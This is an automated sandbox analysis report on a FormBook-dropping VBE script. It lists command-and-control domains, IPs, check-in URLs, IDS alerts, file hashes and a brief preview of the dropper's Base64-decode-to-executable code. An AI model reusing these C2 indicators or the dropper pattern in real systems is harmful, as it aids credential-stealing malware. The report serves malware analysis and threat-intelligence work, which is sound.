                                          		www.tateshades.xyzUnited States
                                          		22612NAMECHEAP-NETUStrue
                                          104.21.29.136
                                          		www.rendamaisbr.comUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          79.133.41.250
                                          		ashleymorgan.liveGermany
                                          		203833AT-FIRSTCOLOAustriaATtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1482976
                                          Start date and time:2024-07-26 13:02:09 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 12m 36s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:TNS71092E68UI0.vbe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winVBE@10/2@12/5
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 121
                                          • Number of non-executed functions: 341
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          07:03:10API Interceptor1x Sleep call for process: HHhHh.exe modified
                                          07:03:20API Interceptor7093104x Sleep call for process: explorer.exe modified
                                          07:03:53API Interceptor6766871x Sleep call for process: wscript.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          103.169.142.0PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.tatetits.fun/hy08/?q4k=ZU/tNHZcxuQwuUysFzqTJgPjiqik5ONlvOVKJJQ3Lwuc3sNdWpL7gNnjk4oVQI6QdUmYC0CSew==&3f2pj=9rDXMfLppP84JvX
                                          Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                          • www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu
                                          LrhyzIl40E4GDdy.exeGet hashmaliciousFormBookBrowse
                                          • www.pedandmore.com/cr12/?BTOpnf=iIPpOUXNyO34lcpLdk5huh2xxw1lHvA4p4NfyRoKXWr7GJ/HmAQJ3oSSYiZx4RWCGij5I5N7HQ==&GdPLV=vBZHrVzHLZo0h4
                                          FX6nkep9GCEHbmb.exeGet hashmaliciousFormBookBrowse
                                          • www.pedandmore.com/cr12/?8pY=c2MXfj9hZ4EphnoP&ZPx4zB2H=iIPpOUXNyO34lcpLdk5huh2xxw1lHvA4p4NfyRoKXWr7GJ/HmAQJ3oSSYh1X/Qq6LDCi
                                          dVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                          • www.piedrajuansebastian.net/fs83/?Txl=O0GPaRWPLnPXX6&NVoluR=s49Ut+wkX4QXz9GJZDxNW7pfCDFSyXZVyJkpGBOG3y/jGvv59DF1wmbR+R4pG2EI6BCdkePZNA==
                                          #U043d#U043e#U0432#U0430_#U043f#U043e#U0440#U044a#U0447#U043a#U0430_pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.nicklawsoncreative.com/m0d5/?4hl=-ZgPd27PJrpD&uZCd=dGhLoH5vjBvSJznqGXUszKfwiWn6UPxWPatQvtz8yx4Tr5Zxdjnw04caI7oX+qJSIHRo
                                          rINQUIRYFORQUOTATION.exeGet hashmaliciousFormBookBrowse
                                          • www.deiaamore.com/a0e6/?1bkDOF=IX0xa&BPWX-v5=8mbVPnG+J9r+9PiSrFOTB0biFER4eJiyZWSSX7iNA85IcvPXL8mibUw7gnCGqicgoGXX
                                          hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.embhajeflexiveis.com/be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p
                                          http://sunprojects.clubGet hashmaliciousHTMLPhisherBrowse
                                          • sunprojects.club/
                                          198.54.117.242Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.usebanq.com/azio/
                                          hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                                          • www.usebanq.com/8lx9/
                                          fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                                          • www.usebanq.com/8lx9/
                                          tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                          • www.usebanq.com/8lx9/
                                          PIG860624BF1GE1532.xml.exeGet hashmaliciousFormBookBrowse
                                          • www.cbsnews23.store/q696/
                                          12nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.cbsnews23.store/q696/
                                          OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                          • www.cbsnews23.store/q696/
                                          prnportccy.vbsGet hashmaliciousFormBookBrowse
                                          • www.rertwre.info/2whg/?o0Zx=XBfcH9YKQNJ7gYYElMI2jgZ671AqBS/+k/0z7hNmt0RBbbFlxuyTDu2wja3ybvTaZji8CR/rwA2iPew+hyoz00W9R3v/3FKbkwDVe2LckHr98S3hZ92xNv4=&tZmp=CfGpi2Bp2bbH12U
                                          m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.cbsnews23.store/q696/
                                          order enquiry PDF.vbsGet hashmaliciousFormBookBrowse
                                          • www.usebanq.com/uf1r/?sRy=BLaLYB&UDwd=ZjtyFPwJHB2+fbXQFBKI637ksOjg2Mch+iRGcCcbVumerEs2DPVaf+8kqQRK+lSc75dhD6fMTI6KWzj8vbB0SjTMUINgNtuWilsH91QlgNou83Xkng==

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ext-sq.squarespace.comLisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          http://hwylovermk.shop/product_details/5509027.htmlGet hashmaliciousUnknownBrowse
                                          • 198.185.159.144
                                          CSCEC Middle East (L.L.C).exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          QNB SWIFT PAYMENT INTER-BANK SETTLEMENT FT22037358.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          xU0wdBC6XWRZ6UY.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 198.185.159.144
                                          FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                          • 198.185.159.144
                                          http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                          • 198.185.159.144
                                          DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 198.185.159.144
                                          yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 198.185.159.144

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AARNET-AS-APAustralianAcademicandResearchNetworkAARNefile.exeGet hashmaliciousSystemBCBrowse
                                          • 103.164.245.233
                                          file.exeGet hashmaliciousSystemBCBrowse
                                          • 103.170.105.14
                                          New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 103.163.138.29
                                          LisectAVT_2403002B_137.dllGet hashmaliciousTrickbotBrowse
                                          • 134.150.60.75
                                          LisectAVT_2403002B_164.exeGet hashmaliciousUACMeBrowse
                                          • 103.165.81.207
                                          Quotation .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • 103.186.116.62
                                          Request Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • 103.186.117.150
                                          https://sidbm.net/officialweb/?russell.sinco@corespecialty.comGet hashmaliciousHTMLPhisherBrowse
                                          • 103.177.95.90
                                          Request for quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • 103.186.117.150
                                          OCcyyxs6dW.elfGet hashmaliciousUnknownBrowse
                                          • 138.44.174.224
                                          MTSRU7Y18r(223).exeGet hashmaliciousBdaejecBrowse
                                          • 62.118.122.137
                                          https://assets-usa.mkt.dynamics.com/95689b1f-9545-ef11-bfdf-00224825570b/digitalassets/standaloneforms/40bb8d8b-d049-ef11-a317-6045bdd83a8bGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                          • 195.35.33.215
                                          Installer Setup 9.7.0.exeGet hashmaliciousUnknownBrowse
                                          • 195.35.49.154
                                          SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                                          • 195.35.33.201
                                          Qa5qvgWyUn.elfGet hashmaliciousMiraiBrowse
                                          • 91.77.166.9
                                          http://pub-a8ca61c8f7dc4c519488087e0ecec227.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 195.35.33.215
                                          http://pub-87e95b6c746d4f758cf64246fecf1595.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 195.35.33.215
                                          jew.m68k.elfGet hashmaliciousUnknownBrowse
                                          • 89.209.77.15
                                          qgtfQPgL23.elfGet hashmaliciousUnknownBrowse
                                          • 91.76.115.62
                                          https://isragohar.github.io/Fb-Clone-Get hashmaliciousUnknownBrowse
                                          • 195.35.10.26
                                          NAMECHEAP-NETUSfile.exeGet hashmaliciousSystemBCBrowse
                                          • 198.54.120.214
                                          LisectAVT_2403002A_333.exeGet hashmaliciousUnknownBrowse
                                          • 198.54.125.89
                                          LisectAVT_2403002A_333.exeGet hashmaliciousUnknownBrowse
                                          • 198.54.125.89
                                          LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.236.122
                                          LisectAVT_2403002A_97.exeGet hashmaliciousDarkVision RatBrowse
                                          • 198.54.126.102
                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                          • 68.65.122.150
                                          LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
                                          • 162.0.225.191
                                          LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.238.43
                                          LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                                          • 198.54.121.233
                                          LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.236.122
                                          CLOUDFLARENETUSIRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                          • 104.21.72.79
                                          SecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                                          • 172.67.134.182
                                          https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                                          • 188.114.96.3
                                          RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 188.114.96.3
                                          https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.159.233
                                          https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.72.79
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.72.79
                                          RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 188.114.96.3

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HHhHh.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\HHhHh.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Temp\HHhHh.exe

                                          Download File
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):574464
                                          Entropy (8bit):7.9719357617793225
                                          Encrypted:false
                                          SSDEEP:12288:PUHa23esgAwon1bfxnltD+u5IgHnWT8GqIvZdww/kV+s00XDsGW4g:Oa2usg9gFZn/D+yImfIvZdw0kV+B0XH
                                          MD5:62FA567CBB7227AEB7755B679D780725
                                          SHA1:0280D019165F8DF6B76CFA87047C76D9003AB193
                                          SHA-256:7B67DC6AD75A054A5BAAFF1CB3E61C2436823DE4FD80B6E73CD9CBBB850F6D81
                                          SHA-512:CEB8059393DBF6B2E55FE324FC957A319223508162CB278FA3A48A849B2C77D2AAB285B91C3A122C56C72D2819CE24A18B02BC2BF83963634F083929E74B1B01
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.f..............0.............N.... ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...=..........\...(?..........................................^..}.....(.......(.....*.0../........(...........s....o...........s.... ....o.....*..0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+..*......C.#f........{....*"..}....*....0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.....*..0..+.........,..{.......+....,...{....o&.......('....*..0......

                                          Static File Info

                                          General

                                          File type:ASCII text, with very long lines (65242), with CRLF line terminators
                                          Entropy (8bit):5.979589269470885
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:TNS71092E68UI0.vbe
                                          File size:804'487 bytes
                                          MD5:83ef588dc92a85ef93d055290393a07d
                                          SHA1:c7fa54bb9f8d5467137197b8e344b95d2e1f4430
                                          SHA256:02500b9058612028c5667bfd9302d81184689fcb88eb5500902d39baec246fa0
                                          SHA512:eb1adad95a1269dd49e202e966b67a8d3867055c1462687596fa47dd133929544a295e2e3b04f8bfe3c87690d241f780f4a1ad75718e462b468007e3e8dd0827
                                          SSDEEP:12288:WEPXAjdRFEYFexVioNs4tkt4pNVZUAZTklPuAGPm1LEKIV8rrq9bbeQnhG4Shmo9:nPXApEY0ioCUpNV+unrKs869FE5hmo9
                                          TLSH:F1051263F3431BD91A479EED8A4527F296D0ADEF1816C6F2DF8A061310F45E24D13E2A
                                          File Content Preview:' Constants for XML and Base64 processing..Const XML_TYPE = "MSXML2.DOMDocument"..Const ELEMENT_TYPE = "text"..Const DATA_TYPE = "bin.base64"....' Declare variables..Dim base64EncodedString, tempFolderPath, executablePath....' Initialize the Base64 encode

                                          File Icon

                                          Icon Hash:68d69b8f86ab9a86

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-07-26T13:07:33.006686+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4972580192.168.2.5103.224.182.210
                                          2024-07-26T13:06:31.117213+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4972380192.168.2.534.149.86.124
                                          2024-07-26T13:03:59.789400+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971752.165.165.26192.168.2.5
                                          2024-07-26T13:04:29.975873+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4971980192.168.2.579.133.41.250
                                          2024-07-26T13:03:47.731358+0200TCP2527003ET Threatview.io High Confidence Cobalt Strike C2 IP group 48049716198.54.117.242192.168.2.5
                                          2024-07-26T13:03:48.249330+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4971680192.168.2.5198.54.117.242
                                          2024-07-26T13:02:59.626273+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4971880192.168.2.5103.169.142.0
                                          2024-07-26T13:03:21.583205+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970952.165.165.26192.168.2.5
                                          2024-07-26T13:06:10.664892+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4972280192.168.2.567.223.118.63
                                          2024-07-26T13:05:50.281197+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)4972180192.168.2.5195.35.41.249

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 26, 2024 13:03:47.726411104 CEST4971680192.168.2.5198.54.117.242
                                          Jul 26, 2024 13:03:47.731358051 CEST8049716198.54.117.242192.168.2.5
                                          Jul 26, 2024 13:03:47.733870029 CEST4971680192.168.2.5198.54.117.242
                                          Jul 26, 2024 13:03:47.733885050 CEST4971680192.168.2.5198.54.117.242
                                          Jul 26, 2024 13:03:47.738805056 CEST8049716198.54.117.242192.168.2.5
                                          Jul 26, 2024 13:03:48.235761881 CEST4971680192.168.2.5198.54.117.242
                                          Jul 26, 2024 13:03:48.249126911 CEST8049716198.54.117.242192.168.2.5
                                          Jul 26, 2024 13:03:48.249330044 CEST4971680192.168.2.5198.54.117.242
                                          Jul 26, 2024 13:04:08.230381012 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.235224962 CEST8049718103.169.142.0192.168.2.5
                                          Jul 26, 2024 13:04:08.235306978 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.235335112 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.240098953 CEST8049718103.169.142.0192.168.2.5
                                          Jul 26, 2024 13:04:08.735759020 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.740252972 CEST8049718103.169.142.0192.168.2.5
                                          Jul 26, 2024 13:04:08.740272045 CEST8049718103.169.142.0192.168.2.5
                                          Jul 26, 2024 13:04:08.740369081 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.740386009 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:08.740685940 CEST8049718103.169.142.0192.168.2.5
                                          Jul 26, 2024 13:04:08.740838051 CEST4971880192.168.2.5103.169.142.0
                                          Jul 26, 2024 13:04:29.475842953 CEST4971980192.168.2.579.133.41.250
                                          Jul 26, 2024 13:04:29.480638981 CEST804971979.133.41.250192.168.2.5
                                          Jul 26, 2024 13:04:29.481951952 CEST4971980192.168.2.579.133.41.250
                                          Jul 26, 2024 13:04:29.481951952 CEST4971980192.168.2.579.133.41.250
                                          Jul 26, 2024 13:04:29.486736059 CEST804971979.133.41.250192.168.2.5
                                          Jul 26, 2024 13:04:29.970160007 CEST4971980192.168.2.579.133.41.250
                                          Jul 26, 2024 13:04:29.975830078 CEST804971979.133.41.250192.168.2.5
                                          Jul 26, 2024 13:04:29.975872993 CEST4971980192.168.2.579.133.41.250
                                          Jul 26, 2024 13:05:29.491038084 CEST4972080192.168.2.5104.21.29.136
                                          Jul 26, 2024 13:05:29.495985985 CEST8049720104.21.29.136192.168.2.5
                                          Jul 26, 2024 13:05:29.496244907 CEST4972080192.168.2.5104.21.29.136
                                          Jul 26, 2024 13:05:29.496283054 CEST4972080192.168.2.5104.21.29.136
                                          Jul 26, 2024 13:05:29.501847982 CEST8049720104.21.29.136192.168.2.5
                                          Jul 26, 2024 13:05:29.983182907 CEST8049720104.21.29.136192.168.2.5
                                          Jul 26, 2024 13:05:29.983217001 CEST8049720104.21.29.136192.168.2.5
                                          Jul 26, 2024 13:05:29.983288050 CEST4972080192.168.2.5104.21.29.136
                                          Jul 26, 2024 13:05:29.986320972 CEST4972080192.168.2.5104.21.29.136
                                          Jul 26, 2024 13:05:29.991242886 CEST8049720104.21.29.136192.168.2.5
                                          Jul 26, 2024 13:05:49.773926973 CEST4972180192.168.2.5195.35.41.249
                                          Jul 26, 2024 13:05:49.778831005 CEST8049721195.35.41.249192.168.2.5
                                          Jul 26, 2024 13:05:49.778902054 CEST4972180192.168.2.5195.35.41.249
                                          Jul 26, 2024 13:05:49.778940916 CEST4972180192.168.2.5195.35.41.249
                                          Jul 26, 2024 13:05:49.784460068 CEST8049721195.35.41.249192.168.2.5
                                          Jul 26, 2024 13:05:50.267174006 CEST4972180192.168.2.5195.35.41.249
                                          Jul 26, 2024 13:05:50.281117916 CEST8049721195.35.41.249192.168.2.5
                                          Jul 26, 2024 13:05:50.281197071 CEST4972180192.168.2.5195.35.41.249

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 26, 2024 13:03:47.440092087 CEST6325053192.168.2.51.1.1.1
                                          Jul 26, 2024 13:03:47.725677013 CEST53632501.1.1.1192.168.2.5
                                          Jul 26, 2024 13:04:07.986484051 CEST5496053192.168.2.51.1.1.1
                                          Jul 26, 2024 13:04:08.229626894 CEST53549601.1.1.1192.168.2.5
                                          Jul 26, 2024 13:04:27.964199066 CEST5479053192.168.2.51.1.1.1
                                          Jul 26, 2024 13:04:28.954454899 CEST5479053192.168.2.51.1.1.1
                                          Jul 26, 2024 13:04:29.475148916 CEST53547901.1.1.1192.168.2.5
                                          Jul 26, 2024 13:04:29.475163937 CEST53547901.1.1.1192.168.2.5
                                          Jul 26, 2024 13:05:08.768634081 CEST6335853192.168.2.51.1.1.1
                                          Jul 26, 2024 13:05:09.212642908 CEST53633581.1.1.1192.168.2.5
                                          Jul 26, 2024 13:05:29.221997023 CEST5425953192.168.2.51.1.1.1
                                          Jul 26, 2024 13:05:29.489697933 CEST53542591.1.1.1192.168.2.5
                                          Jul 26, 2024 13:05:49.596071005 CEST4931653192.168.2.51.1.1.1
                                          Jul 26, 2024 13:05:49.773336887 CEST53493161.1.1.1192.168.2.5
                                          Jul 26, 2024 13:06:10.116986990 CEST5375753192.168.2.51.1.1.1
                                          Jul 26, 2024 13:06:10.163721085 CEST53537571.1.1.1192.168.2.5
                                          Jul 26, 2024 13:06:30.550052881 CEST5396853192.168.2.51.1.1.1
                                          Jul 26, 2024 13:06:30.595186949 CEST53539681.1.1.1192.168.2.5
                                          Jul 26, 2024 13:06:50.970854998 CEST6343453192.168.2.51.1.1.1
                                          Jul 26, 2024 13:06:51.010611057 CEST53634341.1.1.1192.168.2.5
                                          Jul 26, 2024 13:07:11.898164034 CEST6191153192.168.2.51.1.1.1
                                          Jul 26, 2024 13:07:12.005621910 CEST53619111.1.1.1192.168.2.5
                                          Jul 26, 2024 13:07:32.158236027 CEST5505753192.168.2.51.1.1.1
                                          Jul 26, 2024 13:07:32.465130091 CEST53550571.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 26, 2024 13:03:47.440092087 CEST192.168.2.51.1.1.10x6d4dStandard query (0)www.tateshades.xyzA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:07.986484051 CEST192.168.2.51.1.1.10xaf9aStandard query (0)www.gyosei-arimura.comA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:27.964199066 CEST192.168.2.51.1.1.10x16bdStandard query (0)www.ashleymorgan.liveA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:28.954454899 CEST192.168.2.51.1.1.10x16bdStandard query (0)www.ashleymorgan.liveA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:08.768634081 CEST192.168.2.51.1.1.10xfb71Standard query (0)www.gv031.netA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:29.221997023 CEST192.168.2.51.1.1.10x6b26Standard query (0)www.rendamaisbr.comA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:49.596071005 CEST192.168.2.51.1.1.10x5f92Standard query (0)www.especialistaleitura.onlineA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:10.116986990 CEST192.168.2.51.1.1.10x87deStandard query (0)www.rtproketslotcsn.artA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:30.550052881 CEST192.168.2.51.1.1.10x8497Standard query (0)www.exploringtheoutdoors.netA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:50.970854998 CEST192.168.2.51.1.1.10xc4c3Standard query (0)www.invigoratewell.comA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:07:11.898164034 CEST192.168.2.51.1.1.10x611eStandard query (0)www.legalix.xyzA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:07:32.158236027 CEST192.168.2.51.1.1.10xbb21Standard query (0)www.21stcut.shopA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 26, 2024 13:03:47.725677013 CEST1.1.1.1192.168.2.50x6d4dNo error (0)www.tateshades.xyz198.54.117.242A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:08.229626894 CEST1.1.1.1192.168.2.50xaf9aNo error (0)www.gyosei-arimura.com103.169.142.0A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:29.475148916 CEST1.1.1.1192.168.2.50x16bdNo error (0)www.ashleymorgan.liveashleymorgan.liveCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:04:29.475148916 CEST1.1.1.1192.168.2.50x16bdNo error (0)ashleymorgan.live79.133.41.250A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:04:29.475163937 CEST1.1.1.1192.168.2.50x16bdNo error (0)www.ashleymorgan.liveashleymorgan.liveCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:04:29.475163937 CEST1.1.1.1192.168.2.50x16bdNo error (0)ashleymorgan.live79.133.41.250A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:09.212642908 CEST1.1.1.1192.168.2.50xfb71Name error (3)www.gv031.netnonenoneA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:29.489697933 CEST1.1.1.1192.168.2.50x6b26No error (0)www.rendamaisbr.com104.21.29.136A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:05:29.489697933 CEST1.1.1.1192.168.2.50x6b26No error (0)www.rendamaisbr.com172.67.149.56A (IP address)IN (0x0001)false
